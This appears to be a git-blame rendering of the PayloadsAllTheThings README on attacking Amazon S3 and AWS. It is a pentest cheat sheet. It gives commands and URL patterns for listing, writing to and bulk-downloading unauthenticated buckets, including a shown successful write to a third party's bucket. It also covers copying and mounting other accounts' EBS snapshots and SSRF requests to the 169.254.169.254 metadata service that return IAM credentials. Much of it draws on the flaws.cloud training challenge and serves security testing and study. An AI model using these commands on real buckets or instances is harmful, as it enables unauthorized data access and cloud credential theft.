PayloadsAllTheThings/AWS Amazon Bucket S3/README.md

169 lines
5.7 KiB
Markdown
Raw Normal View History

2016-11-11 09:03:35 +00:00
# Amazon Bucket S3 AWS
2018-08-12 21:30:22 +00:00
2018-12-29 12:05:29 +00:00
## Summary
- [AWS Configuration](#aws-configuration)
- [Open Bucket](#open-bucket)
- [Basic tests](#basic-tests)
- [Listing files](#listing-files)
- [Move a file into the bucket](move-a-file-into-the-bucket)
- [Download every things](#download-every-things)
- [Check bucket disk size](#check-bucket-disk-size)
- [AWS - Extract Backup](#aws---extract-backup)
- [Bucket juicy data](#bucket-juicy-data)
## AWS Configuration
Prerequisites, at least you need awscli
2018-08-12 21:30:22 +00:00
```bash
sudo apt install awscli
```
2018-08-12 21:30:22 +00:00
You can get your credential here https://console.aws.amazon.com/iam/home?#/security_credential
but you need an aws account, free tier account : https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/
2018-08-12 21:30:22 +00:00
```javascript
aws configure
AWSAccessKeyId=[ENTER HERE YOUR KEY]
AWSSecretKey=[ENTER HERE YOUR KEY]
```
2018-08-12 21:30:22 +00:00
```javascript
aws configure --profile nameofprofile
```
then you can use *--profile nameofprofile* in the aws command.
Alternatively you can use environment variables instead of creating a profile.
```bash
export AWS_ACCESS_KEY_ID=ASIAZ[...]PODP56
export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ
export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
```
## Open Bucket
By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names
2018-08-12 21:30:22 +00:00
```bash
2016-11-11 09:03:35 +00:00
http://s3.amazonaws.com/[bucket_name]/
http://[bucket_name].s3.amazonaws.com/
http://flaws.cloud.s3.amazonaws.com/
https://buckets.grayhatwarfare.com/
2016-11-11 09:03:35 +00:00
```
2018-10-20 15:03:13 +00:00
Their names are also listed if the listing is enabled.
```xml
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>adobe-REDACTED-REDACTED-REDACTED</Name>
```
Alternatively you can extract the name of inside-site s3 bucket with `%C0`. (Trick from https://twitter.com/0xmdv/status/1065581916437585920)
```xml
http://example.com/resources/id%C0
eg: http://redacted/avatar/123%C0
```
2018-12-29 12:05:29 +00:00
## Basic tests
### Listing files
2018-08-12 21:30:22 +00:00
```bash
aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
2020-12-12 17:34:10 +00:00
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
2016-11-11 09:03:35 +00:00
```
2018-08-12 21:30:22 +00:00
You can get the region with a dig and nslookup
2018-08-12 21:30:22 +00:00
```bash
$ dig flaws.cloud
;; ANSWER SECTION:
2018-08-12 21:30:22 +00:00
flaws.cloud. 5 IN A 52.218.192.11
2016-11-11 09:03:35 +00:00
$ nslookup 52.218.192.11
Non-authoritative answer:
2018-08-12 21:30:22 +00:00
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
```
2018-12-29 12:05:29 +00:00
### Move a file into the bucket
2018-08-12 21:30:22 +00:00
2018-10-20 15:03:13 +00:00
```bash
aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read
aws s3 cp login.html s3://$bucketName --grants read=uri=http://acs.amazonaws.com/groups/global/AllUsers
```
2018-08-12 21:30:22 +00:00
```bash
2016-11-11 09:03:35 +00:00
aws s3 mv test.txt s3://hackerone.marketing
FAIL : "move failed: ./test.txt to s3://hackerone.marketing/test.txt A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."
aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
```
2018-12-29 12:05:29 +00:00
### Download every things
2018-08-12 21:30:22 +00:00
```powershell
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
```
2018-12-29 12:05:29 +00:00
### Check bucket disk size
Use `--no-sign` for un-authenticated check.
2018-08-12 21:30:22 +00:00
```powershell
aws s3 ls s3://<bucketname> --recursive | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'
```
## AWS - Extract Backup
2018-08-12 21:30:22 +00:00
```powershell
2020-02-23 19:58:53 +00:00
$ aws --profile flaws sts get-caller-identity
"Account": "XXXX26262029",
2020-02-23 19:58:53 +00:00
$ aws --profile profile_name ec2 describe-snapshots
2020-12-12 17:34:10 +00:00
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
"SnapshotId": "snap-XXXX342abd1bdcb89",
Create a volume using snapshot
2020-02-23 19:58:53 +00:00
$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89
In Aws Console -> EC2 -> New Ubuntu
2020-02-23 19:58:53 +00:00
$ chmod 400 YOUR_KEY.pem
$ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
Mount the volume
2020-02-23 19:58:53 +00:00
$ lsblk
$ sudo file -s /dev/xvda1
$ sudo mount /dev/xvda1 /mnt
```
2018-12-29 12:05:29 +00:00
## Bucket juicy data
2018-08-12 21:30:22 +00:00
Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting :
2018-08-12 21:30:22 +00:00
```powershell
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE will return the AccessKeyID, SecretAccessKey, and Token
2018-11-13 22:25:18 +00:00
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
```
2018-08-12 21:30:22 +00:00
For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2018-12-29 12:05:29 +00:00
* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets)
* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
* [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
2018-12-29 12:05:29 +00:00
* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
2019-06-16 21:45:52 +00:00
* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
2019-08-18 10:08:51 +00:00
* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
2020-12-12 17:34:10 +00:00
* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)